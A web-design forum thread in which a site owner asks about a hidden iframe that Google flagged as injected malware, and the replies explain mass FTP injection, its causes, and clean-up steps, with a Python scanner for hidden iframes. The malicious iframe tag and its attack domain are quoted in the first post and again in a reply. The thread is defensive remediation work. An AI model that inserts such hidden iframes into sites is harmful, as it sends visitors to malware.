Welcome to TalkGraphics.com
  1. #1
    Join Date
    Oct 2004
    Posts
    19

    website with suspected injection code

    Below is a message I received on Google on a page of my website:

    When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

    Here is the suspected injected code:

    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://stateexpressindia.com/wmaf.html?i=1513991>

    My server host company told me that it could be a java exploit through Xara Web Designer MX Premium software.

    Has anyone else had this problem?

  2. #2

    Re: website with suspected injection code

    Xara Web Designer doesn't use any Java (unless you have added some via placeholders etc?)

  3. #3
    Join Date
    Sep 2011
    Location
    Darlington, Western Australia
    Posts
    239

    Re: website with suspected injection code

    Quote Originally Posted by coachjimgil:
    Below is a message I received on Google on a page of my website:

    When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

    Here is the suspected injected code:

    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://stateexpressindia.com/wmaf.html?i=1513991>

    My server host company told me that it could be a java exploit through Xara Web Designer MX Premium software.

    Has anyone else had this problem?
    I can tell you exactly what this is coachjimgil. I had the same thing happen with a client's website. If you look carefully at the code you will see a domain hidden in there: stateexpressindia.com. If you open that you will get a screen that will tell you what this site actually is attempting to do to your own site. This is what you will find if you visit stateexpressindia.com:

    Reported Attack Page!
    This web page at stateexpressindia.com has been reported as an attack page and has been blocked based on your security preferences. Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system. Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

    AND THIS IS ALSO WHAT YOU WILL FIND IF YOU CLICK ON THE BUTTON - Why was this page blocked? http://safebrowsing.clients.google.c...ressindia.com/

    Sometimes code is inserted by these shysters to gain a higher page ranking for clients that they have charged for SEO services. They hijack your site and when people try to click to other pages on your site they are directed to someone else's site.

    It may be an idea to use FileZilla to FTP into your host and check if there are any errant files that do not belong to your site. I found more than 1000 web pages on my client's file manager on her host, and none of them had anything to do with her. Her site lost its page one ranking with Google and I had to reapply to be able to use her domain and site. It took 7 weeks before Google would index her site again and consider that she was not part of this malicious link farming instigated by a scam Indian SEO website (in this case, not State Express India but one like them).

    You will need to respond to Google if you want to keep your site from being dropped by them in the next couple of weeks. But before you respond to them, remove all errant code and any errant files. Good luck! Abi

  4. #4
    Join Date
    Jul 2008
    Location
    Phoenix, AZ
    Posts
    267

    Re: website with suspected injection code

    I've seen this more often than most probably have. Most of the time, a person logged in via FTP, downloaded a bunch of files, then probably ran a program that does a mass insert of the malicious code into the files, then uploaded them again to the website. The other common way is a script with a vulnerability installed on the site. I've seen this in a lot of WordPress third party plugins/themes. It allows the hacker to upload a malicious script that basically gives them file access via the browser.

    Usually the cause of the problem is a keylogger/spyware installed on the computer of a person that had FTP access to the site. I always recommend to the client to do a full virus scan of their computer with a good up-to-date virus scanner and, after fixing the problem, change the FTP password.

    You can normally find the files that are compromised by looking at the file dates. The file dates of the files that were compromised should all have the same date and almost same time stamp. Sometimes htm/html extensions are the ones they got, sometimes php or js extensions, sometimes all of them.

    Usually the same code is injected in all the files and it's normally at the very end of the file. For a few files, it's not too hard to remove, but if you have hundreds of files it gets rather monotonous, and if you have a search and replace program installed on your computer, you should be able to use it to remove all the code similar to how the hacker put it in.

    Another way is if your host has a backup, many do backups daily. Some retain more than one backup. If they have a backup older than the date the site was compromised, they may restore the files for you.

    Of course, if you have your own backup also, you may use that to overwrite the infected files.

    Some hosting control panels have a virus scanner in them. It's great for finding malicious files and also sometimes finds files that have been injected with malicious code. It may give a delete and/or quarantine option for files it finds, but, I just like it for finding them quickly so I know what files to investigate.

    Your host may also give you access to FTP logs. These are great for a few reasons. They allow you to see what files were downloaded/uploaded and the IP address of the hacker (which is often just a proxy/infected computer/infected server and not very meaningful), but you should also see the IP address of the legitimate user that last logged in before the hacker, to give you a clue to whose computer may be infected. I've seen the hacker log in anywhere from a few days to a few weeks after the legit user logged in.
    Chris
    LotsMoreHosting.com
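    A small scanner for the clean-up ckh describes (one hidden iframe appended to many files, all sharing a time stamp, then removed in bulk), added here as an example; it is not code from the thread or from any product named in it. The iframe pattern is a loose heuristic for 1-2 px frames, and the sample site, the example.invalid domain and the fixed time stamp are constructed for the demonstration.

```python
import os
import re
import tempfile
from collections import defaultdict
from datetime import datetime

# Heuristic for a hidden 1-2 px iframe like the one quoted in the thread (any attribute order).
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*\b(?:height|width)=["\']?[0-2]["\']?(?=[\s>])[^>]*>(?:\s*</iframe>)?',
    re.IGNORECASE)
WEB_EXTS = {'.htm', '.html', '.php', '.js'}  # the extensions ckh says usually get hit

def find_hidden_iframes(text):
    """Return every hidden-iframe tag found in text (empty list if clean)."""
    return [m.group(0) for m in HIDDEN_IFRAME.finditer(text)]
def strip_hidden_iframes(text):
    """Return text with hidden iframes removed: the bulk search-and-replace step."""
    return HIDDEN_IFRAME.sub('', text)

def scan_site(root):
    """Walk a downloaded site copy; return {path: (mtime, [tags])} for infected files."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in WEB_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                found = find_hidden_iframes(fh.read())
            if found:
                hits[path] = (os.path.getmtime(path), found)
    return hits
def group_by_minute(hits):
    """Cluster infected files by modification minute; a mass injection forms one tight group."""
    groups = defaultdict(list)
    for path, (mtime, _) in hits.items():
        groups[datetime.fromtimestamp(mtime).strftime('%Y-%m-%d %H:%M')].append(path)
    return dict(groups)

def build_sample_site():
    """Write a constructed sample site (hypothetical content, not real data) and return its path."""
    root = tempfile.mkdtemp()
    clean = '<html><body><p>hello</p></body></html>\n'
    injected = clean + ('<iframe name=Twitter scrolling=auto frameborder=no align=center '
                        'height=2 width=2 src=http://example.invalid/wmaf.html?i=0>\n')
    for name, body in [('index.html', injected), ('about.htm', injected),
                       ('app.js', 'console.log(1);\n'), ('notes.txt', injected)]:
        path = os.path.join(root, name)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(body)
        os.utime(path, (1_400_000_000, 1_400_000_000))  # same stamp, as after a mass upload
    return root
```

    Run scan_site over a local download of the site, review the reported files and their time-stamp cluster, and only then apply strip_hidden_iframes to each one.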

  5. #5
    Join Date
    Jul 2001
    Location
    Lisbon, Portugal
    Posts
    1,043

    Re: website with suspected injection code

    @Abikadabra and @ckh
    Thanks for your posts. Very useful info.
